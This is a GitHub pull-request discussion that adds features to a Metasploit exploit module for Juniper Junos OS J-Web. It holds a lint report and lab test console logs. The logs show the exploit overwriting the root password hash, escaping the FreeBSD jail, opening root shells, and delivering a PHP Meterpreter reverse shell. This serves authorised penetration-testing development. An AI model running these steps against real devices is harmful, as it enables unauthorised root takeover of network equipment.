Junos OS PHPRC: Added features for interactive ssh jailbreak

[softScheck]

This pull request adds several features:

1. Provides options to change the session directory and hash format, accommodating differences in older Junos OS versions.
2. Adds a method to create a valid user session if one is missing (a session is needed for the exploit) by using a minimalistic custom login.php to create this session on the device.
3. Adds an option to change the settings to allow root SSH login. This is necessary for the interactive jailbreak SSH connection.
4. Modifies the method for reading CSRF tokens to use the same method the exploit verifies, ensuring consistency and enabling the printing of the contents of the used cookie file.
5. Always sends SECUREPHPSESSID additionally that is used if SSL is enabled.

[softScheck]

This was tested with Junos OS 23.2R1.13, 20.2R3.9 and a very old version 12.3R11.2

[bwatters-r7]

Per the linting failure:

--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb:35 - [WARNING] Spaces at EOL
modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb:36 - [WARNING] Spaces at EOL
modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb:37 - [WARNING] Spaces at EOL
modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb:145 - [WARNING] Spaces at EOL
modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb:200 - [WARNING] Spaces at EOL
modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb:211 - [WARNING] Spaces at EOL
modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb:225 - [WARNING] Spaces at EOL
modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb:2[28](https://github.com/rapid7/metasploit-framework/actions/runs/9405267954/job/25952256948?pr=19229#step:5:29) - [WARNING] Spaces at EOL
== modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb ==
C: 35:116: [Correctable] Layout/TrailingWhitespace: Trailing whitespace detected.
C: 36:115: [Correctable] Layout/TrailingWhitespace: Trailing whitespace detected.
C: 37:121: [Correctable] Layout/TrailingWhitespace: Trailing whitespace detected.
C: 39:  9: [Correctable] Layout/ModuleDescriptionIndentation: Module descriptions should be properly aligned to the 'Description' key, and within %q{ ... }
C:145:  1: [Correctable] Layout/TrailingWhitespace: Trailing whitespace detected.
C:156: 25: [Correctable] Style/DefWithParentheses: Omit the parentheses in defs when the method doesn't accept any arguments.
C:200:  1: [Correctable] Layout/TrailingWhitespace: Trailing whitespace detected.
C:211:  1: [Correctable] Layout/TrailingWhitespace: Trailing whitespace detected.
C:213: 41: [Correctable] Style/StringLiterals: Prefer single-quoted strings when you don't need string interpolation or special symbols.
C:225:  1: [Correctable] Layout/TrailingWhitespace: Trailing whitespace detected.
C:228:  1: [Correctable] Layout/TrailingWhitespace: Trailing whitespace detected.
C:[32](https://github.com/rapid7/metasploit-framework/actions/runs/9405267954/job/25952256948?pr=19229#step:5:33)6: 18: [Correctable] Style/StringLiterals: Prefer single-quoted strings when you don't need string interpolation or special symbols.

1 file inspected, 12 offenses detected, 12 offenses autocorrectable
modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb - [ERROR] Rubocop failed. Please run rubocop -a modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb and verify all issues are resolved

[jheysel-r7]

Hey @softScheck thanks for the enhancement! It's much appreciated. I've created an account at juniper.net in hopes to download the older version 12.3R11.2 for testing and verification purposes. I got an email saying my request is being processed and that it might take some time. If you know where I might be able to find a copy of the older version if you could email any info to msfdev@metasploit.com that would be greatly appreciated!

[jheysel-r7]

Final testing 👌

Target: Interactive SSH with jail break

Create session

msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > rexploit
[*] Reloading module...

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Environment variable manipulation succeeded indicating this target is vulnerable.
[*] Attempting to break out of FreeBSD jail by changing the root user's password, establishing an SSH session and then rewriting the original root user's password hash to /etc/master.passwd.
[!] This requires a user is authenticated to the J-Web application in order to steal a session token or successfully create one, also 'ssh root-login' has to be set to 'allow' on the device. The option 'SET_ALLOW_ROOT_LOGIN' can be set to true to attempt to set this option.
[*] No PHPSESSID found in /var/sess. Trying to create a session.
[*] Session created: ac4012fd3935b9f885048028787c6a86.
[*] PHPSESSID: ac4012fd3935b9f885048028787c6a86.
[*] Found csrf token: ampyoplauh8iwtetkv09lq13z4ozo4kx.
[*] Original encrypted root password: $6$a/uamAgu$jQ4G30h.DYWn.mbYclGJRlDmqO5ZzWnIPh.GwNwcLiz4xIl01xEHWm1CiwCMZVlyPEQu1UusPoKThZW/R3vLe1
[*] Temporary root password Hash: $6$431vOSGg/GHSWWCO$7mxPGKaZcc68PwWEadDSFBoT0CTtW/i3i6LWa5qlinFMl4MBHq2ToYkFSD7Hk5rP0Uc/qVk/UYIQq867T25.j0
[*] Setting root password to 8pY2FePOVarMALD631XbomSo - this can take some time!
[*] Successfully changed the root user's password
[+] Logged in as root
[*] Found shell.
[*] Setting root password back to original hash. This can take some time! If no session was created try 'SET_ALLOW_ROOT_LOGIN'.
[*] Successfully changed the root user's password
[*] Command shell session 5 opened (192.168.1.77:54484 -> 192.168.1.83:22) at 2024-06-14 09:32:19 -0700

id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),10(field),31(guest),73(config)
uname -a
\FreeBSD msfhost JNPR-11.0-20200608.0016468_buil FreeBSD JNPR-11.0-20200608.0016468_builder_stable_11 #0 r356482+0016468ed6c(stable/11): Sun Jun  7 23:59:18 PDT 2020     builder@feyrith.juniper.net:/volume/build/junos/occam/llvm-5.0/sandbox-20200605/freebsd/stable_11/20200605.171711_builder_stable_11.0016468/obj/amd64/juniper/kernels/JNPR-AMD64-PRD/kernel  amd64

Steal session

msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > run

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Environment variable manipulation succeeded indicating this target is vulnerable.
[*] Attempting to break out of FreeBSD jail by changing the root user's password, establishing an SSH session and then rewriting the original root user's password hash to /etc/master.passwd.
[!] This requires a user is authenticated to the J-Web application in order to steal a session token or successfully create one, also 'ssh root-login' has to be set to 'allow' on the device. The option 'SET_ALLOW_ROOT_LOGIN' can be set to true to attempt to set this option.
[*] PHPSESSID: ac4012fd3935b9f885048028787c6a86.
[*] Found csrf token: ampyoplauh8iwtetkv09lq13z4ozo4kx.
[*] Original encrypted root password: $6$a/uamAgu$jQ4G30h.DYWn.mbYclGJRlDmqO5ZzWnIPh.GwNwcLiz4xIl01xEHWm1CiwCMZVlyPEQu1UusPoKThZW/R3vLe1
[*] Temporary root password Hash: $6$eDJbgmD90erNV0aA$zLaBz4FTGnSlI4nvc00YmzhEpVqYRcdvY6ZQlYor3UdfO1JgbUPVn4R.AI/JpBLTCnItGzSQFcVTPPjIpMONf1
[*] Setting root password to 8pY2FePOVarMALD631XbomSo - this can take some time!
[*] Successfully changed the root user's password
[+] Logged in as root
[*] Found shell.
[*] Setting root password back to original hash. This can take some time! If no session was created try 'SET_ALLOW_ROOT_LOGIN'.
[*] Successfully changed the root user's password
[*] Command shell session 6 opened (192.168.1.77:54495 -> 192.168.1.83:22) at 2024-06-14 09:32:41 -0700

id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),10(field),31(guest),73(config)
uname -a
FreeBSD msfhost JNPR-11.0-20200608.0016468_buil FreeBSD JNPR-11.0-20200608.0016468_builder_stable_11 #0 r356482+0016468ed6c(stable/11): Sun Jun  7 23:59:18 PDT 2020     builder@feyrith.juniper.net:/volume/build/junos/occam/llvm-5.0/sandbox-20200605/freebsd/stable_11/20200605.171711_builder_stable_11.0016468/obj/amd64/juniper/kernels/JNPR-AMD64-PRD/kernel  amd64

Steal session + set ssh root login to allow

msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > set SET_ALLOW_ROOT_LOGIN true
SET_ALLOW_ROOT_LOGIN => true
msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > run

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Environment variable manipulation succeeded indicating this target is vulnerable.
[*] Attempting to break out of FreeBSD jail by changing the root user's password, establishing an SSH session and then rewriting the original root user's password hash to /etc/master.passwd.
[!] This requires a user is authenticated to the J-Web application in order to steal a session token or successfully create one, also 'ssh root-login' has to be set to 'allow' on the device. The option 'SET_ALLOW_ROOT_LOGIN' can be set to true to attempt to set this option.
[*] PHPSESSID: ac4012fd3935b9f885048028787c6a86.
[*] Found csrf token: ampyoplauh8iwtetkv09lq13z4ozo4kx.
[*] Original encrypted root password: $6$a/uamAgu$jQ4G30h.DYWn.mbYclGJRlDmqO5ZzWnIPh.GwNwcLiz4xIl01xEHWm1CiwCMZVlyPEQu1UusPoKThZW/R3vLe1
[*] Temporary root password Hash: $6$zxlcJTuPEIc/dRSX$PZNUXNGL12EZtPaX21FpGDqQJTWOihiy.qGqeqp6z8gUGwvqqEJrmEXmyIqXHxNCsZkWH9Oc72imD90NAWZpw/
[*] Setting root password to 8pY2FePOVarMALD631XbomSo - this can take some time!
[*] Successfully changed the root user's password
[*] Successfully set ssh root login to allow
[+] Logged in as root
[*] Found shell.
[*] Setting root password back to original hash. This can take some time! If no session was created try 'SET_ALLOW_ROOT_LOGIN'.
[*] Successfully changed the root user's password
[*] Command shell session 7 opened (192.168.1.77:55026 -> 192.168.1.83:22) at 2024-06-14 10:26:11 -0700

id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),10(field),31(guest),73(config)
sysinfo
sysinfo: Command not found.
uname -a
FreeBSD msfhost JNPR-11.0-20200608.0016468_buil FreeBSD JNPR-11.0-20200608.0016468_builder_stable_11 #0 r356482+0016468ed6c(stable/11): Sun Jun  7 23:59:18 PDT 2020     builder@feyrith.juniper.net:/volume/build/junos/occam/llvm-5.0/sandbox-20200605/freebsd/stable_11/20200605.171711_builder_stable_11.0016468/obj/amd64/juniper/kernels/JNPR-AMD64-PRD/kernel  amd64

Steal session + Old Hash Format

msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > set OLD_HASH_FORMAT true
OLD_HASH_FORMAT => true
rmsf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > run

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Environment variable manipulation succeeded indicating this target is vulnerable.
[*] Attempting to break out of FreeBSD jail by changing the root user's password, establishing an SSH session and then rewriting the original root user's password hash to /etc/master.passwd.
[!] This requires a user is authenticated to the J-Web application in order to steal a session token or successfully create one, also 'ssh root-login' has to be set to 'allow' on the device. The option 'SET_ALLOW_ROOT_LOGIN' can be set to true to attempt to set this option.
[*] PHPSESSID: ac4012fd3935b9f885048028787c6a86.
[*] Found csrf token: ampyoplauh8iwtetkv09lq13z4ozo4kx.
[*] Original encrypted root password: $6$a/uamAgu$jQ4G30h.DYWn.mbYclGJRlDmqO5ZzWnIPh.GwNwcLiz4xIl01xEHWm1CiwCMZVlyPEQu1UusPoKThZW/R3vLe1
[*] Temporary root password Hash: $1$7JFOEoKv$LnMw/6gzutwFzNioWNXIg0
[*] Setting root password to 8pY2FePOVarMALD631XbomSo - this can take some time!
[*] Successfully changed the root user's password
[*] Successfully set ssh root login to allow
[+] Logged in as root
[*] Found shell.
[*] Setting root password back to original hash. This can take some time! If no session was created try 'SET_ALLOW_ROOT_LOGIN'.
[*] Successfully changed the root user's password
[*] Command shell session 9 opened (192.168.1.77:55380 -> 192.168.1.83:22) at 2024-06-14 10:46:47 -0700

id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),10(field),31(guest),73(config)
uname -a
FreeBSD msfhost JNPR-11.0-20200608.0016468_buil FreeBSD JNPR-11.0-20200608.0016468_builder_stable_11 #0 r356482+0016468ed6c(stable/11): Sun Jun  7 23:59:18 PDT 2020     builder@feyrith.juniper.net:/volume/build/junos/occam/llvm-5.0/sandbox-20200605/freebsd/stable_11/20200605.171711_builder_stable_11.0016468/obj/amd64/juniper/kernels/JNPR-AMD64-PRD/kernel  amd64

Target: PHP In-Memory

php meterpreter

msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > run

[*] Started reverse TCP handler on 192.168.1.77:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Environment variable manipulation succeeded indicating this target is vulnerable.
[*] Sending stage (39927 bytes) to 192.168.1.83
[*] Meterpreter session 8 opened (192.168.1.77:4444 -> 192.168.1.83:64222) at 2024-06-14 10:43:57 -0700
meterpreter > getuid
Server username: nobody
meterpreter > sysinfo
Computer    : msfhost
OS          : FreeBSD msfhost JNPR-11.0-20200608.0016468_buil FreeBSD JNPR-11.0-20200608.0016468_builder_stable_11 #0 r356482+0016468ed6c(stable/11): Sun Jun  7 23:59:18 PDT 2020     builder@feyrith.juniper.net:/volume/build/junos/occam/llvm-5.0/sandbox-20200605/freebs
Meterpreter : php/freebsd

[jheysel-r7]

Release Notes

The junos_phprc_auto_prepend_file module used to depend on having a user authenticated to the J-Web application to steal the necessary session tokens in order to exploit. With this enhancement the module will now create a session if one doesn't exist. Also it adds datastore options to change the hash format to be compatible with older version as well an option to attempt to set ssh root login to true before attempting to establish a root ssh session.